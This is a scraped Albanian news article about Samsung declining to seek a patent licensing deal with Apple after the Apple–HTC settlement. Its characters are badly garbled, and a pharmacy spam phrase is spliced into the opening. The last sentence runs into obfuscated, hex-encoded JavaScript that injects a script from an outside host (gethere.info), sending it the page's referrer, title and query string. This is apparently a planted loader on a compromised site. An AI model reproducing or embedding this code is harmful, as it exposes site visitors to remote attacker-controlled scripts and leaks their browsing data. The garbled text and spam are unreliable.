largea_samsung-apple1353068939

Samsung nuk ka nA� plan tA� bA�jA� marrA�veshje patentash me Apple

viagra france online f pfizer. Para disa ditA�sh Apple dhe HTC zgjidhA�n njA� konflikt tA� gjatA� qA� pA�rfshinte patentat e tyre.

Kjo u shoqA�rua me njA� marrA�veshje 10 vjeA�are nA� tA� cilA�n u ra dakord qA� tA� dyja kompanitA� tA� shfrytA�zojnA� patentat e njA�ra – tjetrA�s tani dhe nA� tA� ardhmen.

Kjo me siguri ishte njA� lA�vizje e mire pas njA� lA�mshi tA� madh qA� u bA� mbi kA�tA� A�A�shtje. Gjithsesi njA� marrA�veshje e tillA� me rivalin mA� tA� madh tA� Apple nuk do tA� ndodhA�.

GjatA� njA� ngjarje mediatike nA� Seul, shefi i Samsung Mobile Shin Jong-Kyun tha se ishte i vA�rtetA� lajmi se HTC pranoi ti paguante Apple 267 milionA� $, por Samsung-u nuk ka nA� plan tA� negociojA� pA�r njA� marrA�veshje tA� tillA�.

Si pjesA� e kA�saj marrA�veshje HTC do tA� paguajA� 6 $ deri nA� 8 $ pA�r celular, me njA� shumA� tA� pA�rgjithshme nga 180 deri 280 milionA� $ nA� vit.

Apple vazhdon tA� pA�rdorA� pjesA�t elektronike tA� Samsung-ut

Kjo tregon se sa larg janA� kompanitA� nga njA�ra tjetra. NA� fund tA� fundit biznesi A�shtA� biznes. Apple vazhdon tA� pA�rdorA� pjesA�t elektronike tA� Samsung-ut si furnizues kryesor.

Gjithsesi ky biznes duket se po i vjen fundi pasi muajin e kaluar njA� zA�dhA�nA�s i Samsung-ut i tha Korea Times se Apple u kishte thA�nA� se nuk do tA� pA�rdorte mA� pjesA�t e tyre nA� tA� ardhmen.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}